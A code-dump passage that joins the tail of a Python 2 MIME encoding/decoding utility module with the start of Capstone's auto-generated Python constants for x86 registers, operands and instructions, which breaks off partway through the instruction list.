hostid = socket.gethostbyname(socket.gethostname())
except socket.gaierror:
hostid = '127.0.0.1'
try:
uid = repr(os.getuid())
except AttributeError:
uid = '1'
try:
pid = repr(os.getpid())
except AttributeError:
pid = '1'
_prefix = hostid + '.' + uid + '.' + pid
return "%s.%.3f.%d" % (_prefix, time.time(), _get_next_counter())
# Subroutines for decoding some common content-transfer-types
def decode(input, output, encoding):
"""Decode common content-transfer-encodings (base64, quopri, uuencode)."""
if encoding == 'base64':
import base64
return base64.decode(input, output)
if encoding == 'quoted-printable':
import quopri
return quopri.decode(input, output)
if encoding in ('uuencode', 'x-uuencode', 'uue', 'x-uue'):
import uu
return uu.decode(input, output)
if encoding in ('7bit', '8bit'):
return output.write(input.read())
if encoding in decodetab:
pipethrough(input, decodetab[encoding], output)
else:
raise ValueError, \
'unknown Content-Transfer-Encoding: %s' % encoding
def encode(input, output, encoding):
"""Encode common content-transfer-encodings (base64, quopri, uuencode)."""
if encoding == 'base64':
import base64
return base64.encode(input, output)
if encoding == 'quoted-printable':
import quopri
return quopri.encode(input, output, 0)
if encoding in ('uuencode', 'x-uuencode', 'uue', 'x-uue'):
import uu
return uu.encode(input, output)
if encoding in ('7bit', '8bit'):
return output.write(input.read())
if encoding in encodetab:
pipethrough(input, encodetab[encoding], output)
else:
raise ValueError, \
'unknown Content-Transfer-Encoding: %s' % encoding
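# Illustrative round-trip sketch (not part of the original module): encode a
# payload as base64 and decode it back using in-memory file objects.
#
#   from StringIO import StringIO
#   src, enc, out = StringIO('hello world'), StringIO(), StringIO()
#   encode(src, enc, 'base64')
#   enc.seek(0)
#   decode(enc, out, 'base64')
#   assert out.getvalue() == 'hello world'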
# The following is no longer used for standard encodings
# XXX This requires that uudecode and mmencode are in $PATH
uudecode_pipe = '''(
TEMP=/tmp/@uu.$$
sed "s%^begin [0-7][0-7]* .*%begin 600 $TEMP%" | uudecode
cat $TEMP
rm $TEMP
)'''
decodetab = {
'uuencode': uudecode_pipe,
'x-uuencode': uudecode_pipe,
'uue': uudecode_pipe,
'x-uue': uudecode_pipe,
'quoted-printable': 'mmencode -u -q',
'base64': 'mmencode -u -b',
}
encodetab = {
'x-uuencode': 'uuencode tempfile',
'uuencode': 'uuencode tempfile',
'x-uue': 'uuencode tempfile',
'uue': 'uuencode tempfile',
'quoted-printable': 'mmencode -q',
'base64': 'mmencode -b',
}
def pipeto(input, command):
pipe = os.popen(command, 'w')
copyliteral(input, pipe)
pipe.close()
def pipethrough(input, command, output):
(fd, tempname) = tempfile.mkstemp()
temp = os.fdopen(fd, 'w')
copyliteral(input, temp)
temp.close()
pipe = os.popen(command + ' <' + tempname, 'r')
copybinary(pipe, output)
pipe.close()
os.unlink(tempname)
def copyliteral(input, output):
while 1:
line = input.readline()
if not line: break
output.write(line)
def copybinary(input, output):
BUFSIZE = 8192
while 1:
line = input.read(BUFSIZE)
if not line: break
output.write(line)
|
techvoltage/capstone
|
refs/heads/master
|
bindings/python/capstone/x86_const.py
|
33
|
# For Capstone Engine. AUTO-GENERATED FILE, DO NOT EDIT [x86_const.py]
# X86 registers
X86_REG_INVALID = 0
X86_REG_AH = 1
X86_REG_AL = 2
X86_REG_AX = 3
X86_REG_BH = 4
X86_REG_BL = 5
X86_REG_BP = 6
X86_REG_BPL = 7
X86_REG_BX = 8
X86_REG_CH = 9
X86_REG_CL = 10
X86_REG_CS = 11
X86_REG_CX = 12
X86_REG_DH = 13
X86_REG_DI = 14
X86_REG_DIL = 15
X86_REG_DL = 16
X86_REG_DS = 17
X86_REG_DX = 18
X86_REG_EAX = 19
X86_REG_EBP = 20
X86_REG_EBX = 21
X86_REG_ECX = 22
X86_REG_EDI = 23
X86_REG_EDX = 24
X86_REG_EFLAGS = 25
X86_REG_EIP = 26
X86_REG_EIZ = 27
X86_REG_ES = 28
X86_REG_ESI = 29
X86_REG_ESP = 30
X86_REG_FPSW = 31
X86_REG_FS = 32
X86_REG_GS = 33
X86_REG_IP = 34
X86_REG_RAX = 35
X86_REG_RBP = 36
X86_REG_RBX = 37
X86_REG_RCX = 38
X86_REG_RDI = 39
X86_REG_RDX = 40
X86_REG_RIP = 41
X86_REG_RIZ = 42
X86_REG_RSI = 43
X86_REG_RSP = 44
X86_REG_SI = 45
X86_REG_SIL = 46
X86_REG_SP = 47
X86_REG_SPL = 48
X86_REG_SS = 49
X86_REG_CR0 = 50
X86_REG_CR1 = 51
X86_REG_CR2 = 52
X86_REG_CR3 = 53
X86_REG_CR4 = 54
X86_REG_CR5 = 55
X86_REG_CR6 = 56
X86_REG_CR7 = 57
X86_REG_CR8 = 58
X86_REG_CR9 = 59
X86_REG_CR10 = 60
X86_REG_CR11 = 61
X86_REG_CR12 = 62
X86_REG_CR13 = 63
X86_REG_CR14 = 64
X86_REG_CR15 = 65
X86_REG_DR0 = 66
X86_REG_DR1 = 67
X86_REG_DR2 = 68
X86_REG_DR3 = 69
X86_REG_DR4 = 70
X86_REG_DR5 = 71
X86_REG_DR6 = 72
X86_REG_DR7 = 73
X86_REG_FP0 = 74
X86_REG_FP1 = 75
X86_REG_FP2 = 76
X86_REG_FP3 = 77
X86_REG_FP4 = 78
X86_REG_FP5 = 79
X86_REG_FP6 = 80
X86_REG_FP7 = 81
X86_REG_K0 = 82
X86_REG_K1 = 83
X86_REG_K2 = 84
X86_REG_K3 = 85
X86_REG_K4 = 86
X86_REG_K5 = 87
X86_REG_K6 = 88
X86_REG_K7 = 89
X86_REG_MM0 = 90
X86_REG_MM1 = 91
X86_REG_MM2 = 92
X86_REG_MM3 = 93
X86_REG_MM4 = 94
X86_REG_MM5 = 95
X86_REG_MM6 = 96
X86_REG_MM7 = 97
X86_REG_R8 = 98
X86_REG_R9 = 99
X86_REG_R10 = 100
X86_REG_R11 = 101
X86_REG_R12 = 102
X86_REG_R13 = 103
X86_REG_R14 = 104
X86_REG_R15 = 105
X86_REG_ST0 = 106
X86_REG_ST1 = 107
X86_REG_ST2 = 108
X86_REG_ST3 = 109
X86_REG_ST4 = 110
X86_REG_ST5 = 111
X86_REG_ST6 = 112
X86_REG_ST7 = 113
X86_REG_XMM0 = 114
X86_REG_XMM1 = 115
X86_REG_XMM2 = 116
X86_REG_XMM3 = 117
X86_REG_XMM4 = 118
X86_REG_XMM5 = 119
X86_REG_XMM6 = 120
X86_REG_XMM7 = 121
X86_REG_XMM8 = 122
X86_REG_XMM9 = 123
X86_REG_XMM10 = 124
X86_REG_XMM11 = 125
X86_REG_XMM12 = 126
X86_REG_XMM13 = 127
X86_REG_XMM14 = 128
X86_REG_XMM15 = 129
X86_REG_XMM16 = 130
X86_REG_XMM17 = 131
X86_REG_XMM18 = 132
X86_REG_XMM19 = 133
X86_REG_XMM20 = 134
X86_REG_XMM21 = 135
X86_REG_XMM22 = 136
X86_REG_XMM23 = 137
X86_REG_XMM24 = 138
X86_REG_XMM25 = 139
X86_REG_XMM26 = 140
X86_REG_XMM27 = 141
X86_REG_XMM28 = 142
X86_REG_XMM29 = 143
X86_REG_XMM30 = 144
X86_REG_XMM31 = 145
X86_REG_YMM0 = 146
X86_REG_YMM1 = 147
X86_REG_YMM2 = 148
X86_REG_YMM3 = 149
X86_REG_YMM4 = 150
X86_REG_YMM5 = 151
X86_REG_YMM6 = 152
X86_REG_YMM7 = 153
X86_REG_YMM8 = 154
X86_REG_YMM9 = 155
X86_REG_YMM10 = 156
X86_REG_YMM11 = 157
X86_REG_YMM12 = 158
X86_REG_YMM13 = 159
X86_REG_YMM14 = 160
X86_REG_YMM15 = 161
X86_REG_YMM16 = 162
X86_REG_YMM17 = 163
X86_REG_YMM18 = 164
X86_REG_YMM19 = 165
X86_REG_YMM20 = 166
X86_REG_YMM21 = 167
X86_REG_YMM22 = 168
X86_REG_YMM23 = 169
X86_REG_YMM24 = 170
X86_REG_YMM25 = 171
X86_REG_YMM26 = 172
X86_REG_YMM27 = 173
X86_REG_YMM28 = 174
X86_REG_YMM29 = 175
X86_REG_YMM30 = 176
X86_REG_YMM31 = 177
X86_REG_ZMM0 = 178
X86_REG_ZMM1 = 179
X86_REG_ZMM2 = 180
X86_REG_ZMM3 = 181
X86_REG_ZMM4 = 182
X86_REG_ZMM5 = 183
X86_REG_ZMM6 = 184
X86_REG_ZMM7 = 185
X86_REG_ZMM8 = 186
X86_REG_ZMM9 = 187
X86_REG_ZMM10 = 188
X86_REG_ZMM11 = 189
X86_REG_ZMM12 = 190
X86_REG_ZMM13 = 191
X86_REG_ZMM14 = 192
X86_REG_ZMM15 = 193
X86_REG_ZMM16 = 194
X86_REG_ZMM17 = 195
X86_REG_ZMM18 = 196
X86_REG_ZMM19 = 197
X86_REG_ZMM20 = 198
X86_REG_ZMM21 = 199
X86_REG_ZMM22 = 200
X86_REG_ZMM23 = 201
X86_REG_ZMM24 = 202
X86_REG_ZMM25 = 203
X86_REG_ZMM26 = 204
X86_REG_ZMM27 = 205
X86_REG_ZMM28 = 206
X86_REG_ZMM29 = 207
X86_REG_ZMM30 = 208
X86_REG_ZMM31 = 209
X86_REG_R8B = 210
X86_REG_R9B = 211
X86_REG_R10B = 212
X86_REG_R11B = 213
X86_REG_R12B = 214
X86_REG_R13B = 215
X86_REG_R14B = 216
X86_REG_R15B = 217
X86_REG_R8D = 218
X86_REG_R9D = 219
X86_REG_R10D = 220
X86_REG_R11D = 221
X86_REG_R12D = 222
X86_REG_R13D = 223
X86_REG_R14D = 224
X86_REG_R15D = 225
X86_REG_R8W = 226
X86_REG_R9W = 227
X86_REG_R10W = 228
X86_REG_R11W = 229
X86_REG_R12W = 230
X86_REG_R13W = 231
X86_REG_R14W = 232
X86_REG_R15W = 233
X86_REG_ENDING = 234
# Operand type for instruction's operands
X86_OP_INVALID = 0
X86_OP_REG = 1
X86_OP_IMM = 2
X86_OP_MEM = 3
X86_OP_FP = 4
# AVX broadcast type
X86_AVX_BCAST_INVALID = 0
X86_AVX_BCAST_2 = 1
X86_AVX_BCAST_4 = 2
X86_AVX_BCAST_8 = 3
X86_AVX_BCAST_16 = 4
# SSE Code Condition type
X86_SSE_CC_INVALID = 0
X86_SSE_CC_EQ = 1
X86_SSE_CC_LT = 2
X86_SSE_CC_LE = 3
X86_SSE_CC_UNORD = 4
X86_SSE_CC_NEQ = 5
X86_SSE_CC_NLT = 6
X86_SSE_CC_NLE = 7
X86_SSE_CC_ORD = 8
X86_SSE_CC_EQ_UQ = 9
X86_SSE_CC_NGE = 10
X86_SSE_CC_NGT = 11
X86_SSE_CC_FALSE = 12
X86_SSE_CC_NEQ_OQ = 13
X86_SSE_CC_GE = 14
X86_SSE_CC_GT = 15
X86_SSE_CC_TRUE = 16
# AVX Code Condition type
X86_AVX_CC_INVALID = 0
X86_AVX_CC_EQ = 1
X86_AVX_CC_LT = 2
X86_AVX_CC_LE = 3
X86_AVX_CC_UNORD = 4
X86_AVX_CC_NEQ = 5
X86_AVX_CC_NLT = 6
X86_AVX_CC_NLE = 7
X86_AVX_CC_ORD = 8
X86_AVX_CC_EQ_UQ = 9
X86_AVX_CC_NGE = 10
X86_AVX_CC_NGT = 11
X86_AVX_CC_FALSE = 12
X86_AVX_CC_NEQ_OQ = 13
X86_AVX_CC_GE = 14
X86_AVX_CC_GT = 15
X86_AVX_CC_TRUE = 16
X86_AVX_CC_EQ_OS = 17
X86_AVX_CC_LT_OQ = 18
X86_AVX_CC_LE_OQ = 19
X86_AVX_CC_UNORD_S = 20
X86_AVX_CC_NEQ_US = 21
X86_AVX_CC_NLT_UQ = 22
X86_AVX_CC_NLE_UQ = 23
X86_AVX_CC_ORD_S = 24
X86_AVX_CC_EQ_US = 25
X86_AVX_CC_NGE_UQ = 26
X86_AVX_CC_NGT_UQ = 27
X86_AVX_CC_FALSE_OS = 28
X86_AVX_CC_NEQ_OS = 29
X86_AVX_CC_GE_OQ = 30
X86_AVX_CC_GT_OQ = 31
X86_AVX_CC_TRUE_US = 32
# AVX static rounding mode type
X86_AVX_RM_INVALID = 0
X86_AVX_RM_RN = 1
X86_AVX_RM_RD = 2
X86_AVX_RM_RU = 3
X86_AVX_RM_RZ = 4
# Instruction prefixes - to be used in cs_x86.prefix[]
X86_PREFIX_LOCK = 0xf0
X86_PREFIX_REP = 0xf3
X86_PREFIX_REPNE = 0xf2
X86_PREFIX_CS = 0x2e
X86_PREFIX_SS = 0x36
X86_PREFIX_DS = 0x3e
X86_PREFIX_ES = 0x26
X86_PREFIX_FS = 0x64
X86_PREFIX_GS = 0x65
X86_PREFIX_OPSIZE = 0x66
X86_PREFIX_ADDRSIZE = 0x67
# X86 instructions
X86_INS_INVALID = 0
X86_INS_AAA = 1
X86_INS_AAD = 2
X86_INS_AAM = 3
X86_INS_AAS = 4
X86_INS_FABS = 5
X86_INS_ADC = 6
X86_INS_ADCX = 7
X86_INS_ADD = 8
X86_INS_ADDPD = 9
X86_INS_ADDPS = 10
X86_INS_ADDSD = 11
X86_INS_ADDSS = 12
X86_INS_ADDSUBPD = 13
X86_INS_ADDSUBPS = 14
X86_INS_FADD = 15
X86_INS_FIADD = 16
X86_INS_FADDP = 17
X86_INS_ADOX = 18
X86_INS_AESDECLAST = 19
X86_INS_AESDEC = 20
X86_INS_AESENCLAST = 21
X86_INS_AESENC = 22
X86_INS_AESIMC = 23
X86_INS_AESKEYGENASSIST = 24
X86_INS_AND = 25
X86_INS_ANDN = 26
X86_INS_ANDNPD = 27
X86_INS_ANDNPS = 28
X86_INS_ANDPD = 29
X86_INS_ANDPS = 30
X86_INS_ARPL = 31
X86_INS_BEXTR = 32
X86_INS_BLCFILL = 33
X86_INS_BLCI = 34
X86_INS_BLCIC = 35
X86_INS_BLCMSK = 36
X86_INS_BLCS = 37
X86_INS_BLENDPD = 38
X86_INS_BLENDPS = 39
X86_INS_BLENDVPD = 40
X86_INS_BLENDVPS = 41
X86_INS_BLSFILL = 42
X86_INS_BLSI = 43
X86_INS_BLSIC = 44
X86_INS_BLSMSK = 45
X86_INS_BLSR = 46
X86_INS_BOUND = 47
X86_INS_BSF = 48
X86_INS_BSR = 49
X86_INS_BSWAP = 50
X86_INS_BT = 51
X86_INS_BTC = 52
X86_INS_BTR = 53
X86_INS_BTS = 54
X86_INS_BZHI = 55
X86_INS_CALL = 56
X86_INS_CBW = 57
X86_INS_CDQ = 58
X86_INS_CDQE = 59
X86_INS_FCHS = 60
X86_INS_CLAC = 61
X86_INS_CLC = 62
X86_INS_CLD = 63
X86_INS_CLFLUSH = 64
X86_INS_CLGI = 65
X86_INS_CLI = 66
X86_INS_CLTS = 67
X86_INS_CMC = 68
X86_INS_CMOVA = 69
X86_INS_CMOVAE = 70
X86_INS_CMOVB = 71
X86_INS_CMOVBE = 72
X86_INS_FCMOVBE = 73
X86_INS_FCMOVB = 74
X86_INS_CMOVE = 75
X86_INS_FCMOVE = 76
X86_INS_CMOVG = 77
X86_INS_CMOVGE = 78
X86_INS_CMOVL = 79
X86_INS_CMOVLE = 80
X86_INS_FCMOVNBE = 81
X86_INS_FCMOVNB = 82
X86_INS_CMOVNE = 83
X86_INS_FCMOVNE = 84
X86_INS_CMOVNO = 85
X86_INS_CMOVNP = 86
X86_INS_FCMOVNU = 87
X86_INS_CMOVNS = 88
X86_INS_CMOVO = 89
X86_INS_CMOVP = 90
X86_INS_FCMOVU = 91
X86_INS_CMOVS = 92
X86_INS_CMP = 93
X86_INS_CMPPD = 94
X86_INS_CMPPS = 95
X86_INS_CMPSB = 96
X86_INS_CMPSD = 97
X86_INS_CMPSQ = 98
X86_INS_CMPSS = 99
X86_INS_CMPSW = 100
X86_INS_CMPXCHG16B = 101
X86_INS_CMPXCHG = 102
X86_INS_CMPXCHG8B = 103
X86_INS_COMISD = 104
X86_INS_COMISS = 105
X86_INS_FCOMP = 106
X86_INS_FCOMPI = 107
X86_INS_FCOMI = 108
X86_INS_FCOM = 109
X86_INS_FCOS = 110
X86_INS_CPUID = 111
X86_INS_CQO = 112
X86_INS_CRC32 = 113
X86_INS_CVTDQ2PD = 114
X86_INS_CVTDQ2PS = 115
X86_INS_CVTPD2DQ = 116
X86_INS_CVTPD2PS = 117
X86_INS_CVTPS2DQ = 118
X86_INS_CVTPS2PD = 119
X86_INS_CVTSD2SI = 120
X86_INS_CVTSD2SS = 121
X86_INS_CVTSI2SD = 122
X86_INS_CVTSI2SS = 123
X86_INS_CVTSS2SD = 124
X86_INS_CVTSS2SI = 125
X86_INS_CVTTPD2DQ = 126
X86_INS_CVTTPS2DQ = 127
X86_INS_CVTTSD2SI = 128
X86_INS_CVTTSS2SI = 129
X86_INS_CWD = 130
X86_INS_CWDE = 131
X86_INS_DAA = 132
X86_INS_DAS = 133
X86_INS_DATA16 = 134
X86_INS_DEC = 135
X86_INS_DIV = 136
X86_INS_DIVPD = 137
X86_INS_DIVPS = 138
X86_INS_FDIVR = 139
X86_INS_FIDIVR = 140
X86_INS_FDIVRP = 141
X86_INS_DIVSD = 142
X86_INS_DIVSS = 143
X86_INS_FDIV = 144
X86_INS_FIDIV = 145
X86_INS_FDIVP = 146
X86_INS_DPPD = 147
X86_INS_DPPS = 148
X86_INS_RET = 149
X86_INS_ENCLS = 150
X86_INS_ENCLU = 151
X86_INS_ENTER = 152
X86_INS_EXTRACTPS = 153
X86_INS_EXTRQ = 154
X86_INS_F2XM1 = 155
X86_INS_LCALL = 156
X86_INS_LJMP = 157
X86_INS_FBLD = 158
X86_INS_FBSTP = 159
X86_INS_FCOMPP = 160
X86_INS_FDECSTP = 161
X86_INS_FEMMS = 162
X86_INS_FFREE = 163
X86_INS_FICOM = 164
X86_INS_FICOMP = 165
X86_INS_FINCSTP = 166
X86_INS_FLDCW = 167
X86_INS_FLDENV = 168
X86_INS_FLDL2E = 169
X86_INS_FLDL2T = 170
X86_INS_FLDLG2 = 171
X86_INS_FLDLN2 = 172
X86_INS_FLDPI = 173
X86_INS_FNCLEX = 174
X86_INS_FNINIT = 175
X86_INS_FNOP = 176
X86_INS_FNSTCW = 177
X86_INS_FNSTSW = 178
X86_INS_FPATAN = 179
X86_INS_FPREM = 180
X86_INS_FPREM1 = 181
X86_INS_FPTAN = 182
X86_INS_FRNDINT = 183
X86_INS_FRSTOR = 184
X86_INS_FNSAVE = 185
X86_INS_FSCALE = 186
X86_INS_FSETPM = 187
X86_INS_FSINCOS = 188
X86_INS_FNSTENV = 189
X86_INS_FXAM = 190
X86_INS_FXRSTOR = 191
X86_INS_FXRSTOR64 = 192
X86_INS_FXSAVE = 193
X86_INS_FXSAVE64 = 194
X86_INS_FXTRACT = 195
X86_INS_FYL2X = 196
X86_INS_FYL2XP1 = 197
X86_INS_MOVAPD = 198
X86_INS_MOVAPS = 199
X86_INS_ORPD = 200
X86_INS_ORPS = 201
X86_INS_VMOVAPD = 202
X86_INS_VMOVAPS = 203
X86_INS_XORPD = 204
X86_INS_XORPS = 205
X86_INS_GETSEC = 206
X86_INS_HADDPD = 207
X86_INS_HADDPS = 208
X86_INS_HLT = 209
X86_INS_HSUBPD = 210
X86_INS_HSUBPS = 211
X86_INS_IDIV = 212
X86_INS_FILD = 213
X86_INS_IMUL = 214
X86_INS_IN = 215
X86_INS_INC = 216
X86_INS_INSB = 217
X86_INS_INSERTPS = 218
X86_INS_INSERTQ = 219
X86_INS_INSD = 220
X86_INS_INSW = 221
X86_INS_INT = 222
X86_INS_INT1 = 223
X86_INS_INT3 = 224
X86_INS_INTO = 225
X86_INS_INVD = 226
X86_INS_INVEPT = 227
X86_INS_INVLPG = 228
X86_INS_INVLPGA = 229
X86_INS_INVPCID = 230
X86_INS_INVVPID = 231
X86_INS_IRET = 232
X86_INS_IRETD = 233
X86_INS_IRETQ = 234
X86_INS_FISTTP = 235
X86_INS_FIST = 236
X86_INS_FISTP = 237
X86_INS_UCOMISD = 238
X86_INS_UCOMISS = 239
X86_INS_VCMP = 240
X86_INS_VCOMISD = 241
X86_INS_VCOMISS = 242
X86_INS_VCVTSD2SS = 243
X86_INS_VCVTSI2SD = 244
X86_INS_VCVTSI2SS = 245
X86_INS_VCVTSS2SD = 246
X86_INS_VCVTTSD2SI = 247
X86_INS_VCVTTSD2USI = 248
X86_INS_VCVTTSS2SI = 249
X86_INS_VCVTTSS2USI = 250
X86_INS_VCVTUSI2SD = 251
X86_INS_VCVTUSI2SS = 252
X86_INS_VUCOMISD = 253
X86_INS_VUCOMISS = 254
X86_INS_JAE = 255
X86_INS_JA = 256
X86_INS_JBE = 257
X86_INS_JB = 258
X86_INS_JCXZ = 259
X86_INS_JECXZ = 260
X86_INS_JE = 261
X86_INS_JGE = 262
X86_INS_JG = 263
X86_INS_JLE = 264
X86_INS_JL = 265
X86_INS_JMP = 266
X86_INS_JNE = 267
X86_INS_JNO = 268
X86_INS_JNP = 269
X86_INS_JNS = 270
X86_INS_JO = 271
X86_INS_JP = 272
X86_INS_JRCXZ = 273
X86_INS_JS = 274
X86_INS_KANDB = 275
X86_INS_KANDD = 276
X86_INS_KANDNB = 277
X86_INS_KANDND = 278
X86_INS_KANDNQ = 279
X86_INS_KANDNW = 280
X86_INS_KANDQ = 281
X86_INS_KANDW = 282
X86_INS_KMOVB = 283
X86_INS_KMOVD = 284
X86_INS_KMOVQ = 285
X86_INS_KMOVW = 286
X86_INS_KNOTB = 287
X86_INS_KNOTD = 288
X86_INS_KNOTQ = 289
X86_INS_KNOTW = 290
X86_INS_KORB = 291
X86_INS_KORD = 292
X86_INS_KORQ = 293
X86_INS_KORTESTW = 294
X86_INS_KORW = 295
X86_INS_KSHIFTLW = 296
X86_INS_KSHIFTRW = 297
X86_INS_KUNPCKBW = 298
X86_INS_KXNORB = 299
X86_INS_KXNORD = 300
X86_INS_KXNORQ = 301
X86_INS_KXNORW = 302
X86_INS_KXORB = 303
X86_INS_KXORD = 304
X86_INS_KXORQ = 305
X86_INS_KXORW = 306
X86_INS_LAHF = 307
X86_INS_LAR = 308
X86_INS_LDDQU = 309
X86_INS_LDMXCSR = 310
X86_INS_LDS = 311
X86_INS_FLDZ = 312
X86_INS_FLD1 = 313
X86_INS_FLD = 314
X86_INS_LEA = 315
X86_INS_LEAVE = 316
X86_INS_LES = 317
X86_INS_LFENCE = 318
X86_INS_LFS = 319
X86_INS_LGDT = 320
X86_INS_LGS = 321
X86_INS_LIDT = 322
X86_INS_LLDT = 323
X86_INS_LMSW = 324
X86_INS_OR = 325
X86_INS_SUB = 326
X86_INS_XOR = 327
X86_INS_LODSB = 328
X86_INS_LODSD = 329
X86_INS_LODSQ = 330
X86_INS_LODSW = 331
X86_INS_LOOP = 332
X86_INS_LOOPE = 333
X86_INS_LOOPNE = 334
X86_INS_RETF = 335
X86_INS_RETFQ = 336
X86_INS_LSL = 337
X86_INS_LSS = 338
X86_INS_LTR = 339
X86_INS_XADD = 340
X86_INS_LZCNT = 341
X86_INS_MASKMOVDQU = 342
X86_INS_MAXPD = 343
X86_INS_MAXPS = 344
X86_INS_MAXSD = 345
X86_INS_MAXSS = 346
X86_INS_MFENCE = 347
X86_INS_MINPD = 348
X86_INS_MINPS = 349
X86_INS_MINSD = 350
X86_INS_MINSS = 351
X86_INS_CVTPD2PI = 352
X86_INS_CVTPI2PD = 353
X86_INS_CVTPI2PS = 354
X86_INS_CVTPS2PI = 355
X86_INS_CVTTPD2PI = 356
X86_INS_CVTTPS2PI = 357
X86_INS_EMMS = 358
X86_INS_MASKMOVQ = 359
X86_INS_MOVD = 360
X86_INS_MOVDQ2Q = 361
X86_INS_MOVNTQ = 362
X86_INS_MOVQ2DQ = 363
X86_INS_MOVQ = 364
X86_INS_PABSB = 365
X86_INS_PABSD = 366
X86_INS_PABSW = 367
X86_INS_PACKSSDW = 368
X86_INS_PACKSSWB = 369
X86_INS_PACKUSWB = 370
X86_INS_PADDB = 371
X86_INS_PADDD = 372
X86_INS_PADDQ = 373
X86_INS_PADDSB = 374
X86_INS_PADDSW = 375
X86_INS_PADDUSB = 376
X86_INS_PADDUSW = 377
X86_INS_PADDW = 378
X86_INS_PALIGNR = 379
X86_INS_PANDN = 380
X86_INS_PAND = 381
X86_INS_PAVGB = 382
X86_INS_PAVGW = 383
X86_INS_PCMPEQB = 384
X86_INS_PCMPEQD = 385
X86_INS_PCMPEQW = 386
X86_INS_PCMPGTB = 387
X86_INS_PCMPGTD = 388
X86_INS_PCMPGTW = 389
X86_INS_PEXTRW = 390
X86_INS_PHADDSW = 391
X86_INS_PHADDW = 392
X86_INS_PHADDD = 393
X86_INS_PHSUBD = 394
X86_INS_PHSUBSW = 395
X86_INS_PHSUBW = 396
X86_INS_PINSRW = 397
X86_INS_PMADDUBSW = 398
X86_INS_PMADDWD = 399
X86_INS_PMAXSW = 400
X86_INS_PMAXUB = 401
X86_INS_PMINSW = 402
X86_INS_PMINUB = 403
X86_INS_PMOVMSKB = 404
X86_INS_PMULHRSW = 405
X86_INS_PMULHUW = 406
X86_INS_PMULHW = 407
X86_INS_PMULLW = 408
X86_INS_PMULUDQ = 409
X86_INS_POR = 410
X86_INS_PSADBW = 411
X86_INS_PSHUFB = 412
X86_INS_PSHUFW = 413
X86_INS_PSIGNB = 414
X86_INS_PSIGND = 415
X86_INS_PSIGNW = 416
X86_INS_PSLLD = 417
X86_INS_PSLLQ = 418
X86_INS_PSLLW = 419
X86_INS_PSRAD = 420
X86_INS_PSRAW = 421
X86_INS_PSRLD = 422
X86_INS_PSRLQ = 423
X86_INS_PSRLW = 424
X86_INS_PSUBB = 425
X86_INS_PSUBD = 426
X86_INS_PSUBQ = 427
X86_INS_PSUBSB = 428
X86_INS_PSUBSW = 429
X86_INS_PSUBUSB = 430
X86_INS_PSUBUSW = 431
X86_INS_PSUBW = 432
X86_INS_PUNPCKHBW = 433
X86_INS_PUNPCKHDQ = 434
X86_INS_PUNPCKHWD = 435
X86_INS_PUNPCKLBW = 436
X86_INS_PUNPCKLDQ = 437
X86_INS_PUNPCKLWD = 438
X86_INS_PXOR = 439
X86_INS_MONITOR = 440
X86_INS_MONTMUL = 441
X86_INS_MOV = 442
X86_INS_MOVABS = 443
X86_INS_MOVBE = 444
X86_INS_MOVDDUP = 445
X86_INS_MOVDQA = 446
X86_INS_MOVDQU = 447
X86_INS_MOVHLPS = 448
X86_INS_MOVHPD = 449
X86_INS_MOVHPS = 450
X86_INS_MOVLHPS = 451
X86_INS_MOVLPD = 452
X86_INS_MOVLPS = 453
X86_INS_MOVMSKPD = 454
X86_INS_MOVMSKPS = 455
X86_INS_MOVNTDQA = 456
X86_INS_MOVNTDQ = 457
X86_INS_MOVNTI = 458
X86_INS_MOVNTPD = 459
X86_INS_MOVNTPS = 460
X86_INS_MOVNTSD = 461
X86_INS_MOVNTSS = 462
X86_INS_MOVSB = 463
X86_INS_MOVSD = 464
X86_INS_MOVSHDUP = 465
X86_INS_MOVSLDUP = 466
X86_INS_MOVSQ = 467
X86_INS_MOVSS = 468
X86_INS_MOVSW = 469
X86_INS_MOVSX = 470
X86_INS_MOVSXD = 471
X86_INS_MOVUPD = 472
X86_INS_MOVUPS = 473
X86_INS_MOVZX = 474
X86_INS_MPSADBW = 475
X86_INS_MUL = 476
X86_INS_MULPD = 477
X86_INS_MULPS = 478
X86_INS_MULSD = 479
X86_INS_MULSS = 480
X86_INS_MULX = 481
X86_INS_FMUL = 482
X86_INS_FIMUL = 483
X86_INS_FMULP = 484
X86_INS_MWAIT = 485
X86_INS_NEG = 486
X86_INS_NOP = 487
X86_INS_NOT = 488
X86_INS_OUT = 489
X86_INS_OUTSB = 490
X86_INS_OUTSD = 491
X86_INS_OUTSW = 492
X86_INS_PACKUSDW = 493
X86_INS_PAUSE = 494
X86_INS_PAVGUSB = 495
X86_INS_PBLENDVB = 496
X86_INS_PBLENDW = 497
X86_INS_PCLMULQDQ = 498
X86_INS_PCMPEQQ = 499
X86_INS_PCMPESTRI = 500
X86_INS_PCMPESTRM = 501
X86_INS_PCMPGTQ = 502
X86_INS_PCMPISTRI = 503
X86_INS_PCMPISTRM = 504
X86_INS_PDEP = 505
X86_INS_PEXT = 506
X86_INS_PEXTRB = 507
X86_INS_PEXTRD = 508
X86_INS_PEXTRQ = 509
X86_INS_PF2ID = 510
X86_INS_PF2IW = 511
X86_INS_PFACC = 512
X86_INS_PFADD = 513
X86_INS_PFCMPEQ = 514
X86_INS_PFCMPGE = 515
X86_INS_PFCMPGT = 516
X86_INS_PFMAX = 517
X86_INS_PFMIN = 518
X86_INS_PFMUL = 519
X86_INS_PFNACC = 520
X86_INS_PFPNACC = 521
X86_INS_PFRCPIT1 = 522
X86_INS_PFRCPIT2 = 523
X86_INS_PFRCP = 524
X86_INS_PFRSQIT1 = 525
X86_INS_PFRSQRT = 526
X86_INS_PFSUBR = 527
X86_INS_PFSUB = 528
X86_INS_PHMINPOSUW = 529
X86_INS_PI2FD = 530
X86_INS_PI2FW = 531
X86_INS_PINSRB = 532
X86_INS_PINSRD = 533
X86_INS_PINSRQ = 534
X86_INS_PMAXSB = 535
X86_INS_PMAXSD = 536
X86_INS_PMAXUD = 537
X86_INS_PMAXUW = 538
X86_INS_PMINSB = 539
X86_INS_PMINSD = 540
X86_INS_PMINUD = 541
X86_INS_PMINUW = 542
X86_INS_PMOVSXBD = 543
X86_INS_PMOVSXBQ = 544
X86_INS_PMOVSXBW = 545
X86_INS_PMOVSXDQ = 546
X86_INS_PMOVSXWD = 547
X86_INS_PMOVSXWQ = 548
X86_INS_PMOVZXBD = 549
X86_INS_PMOVZXBQ = 550
X86_INS_PMOVZXBW = 551
X86_INS_PMOVZXDQ = 552
X86_INS_PMOVZXWD = 553
X86_INS_PMOVZXWQ = 554
X86_INS_PMULDQ = 555
X86_INS_PMULHRW = 556
X86_INS_PMULLD = 557
X86_INS_POP = 558
X86_INS_POPAW = 559
X86_INS_POPAL = 560
X86_INS_POPCNT = 561
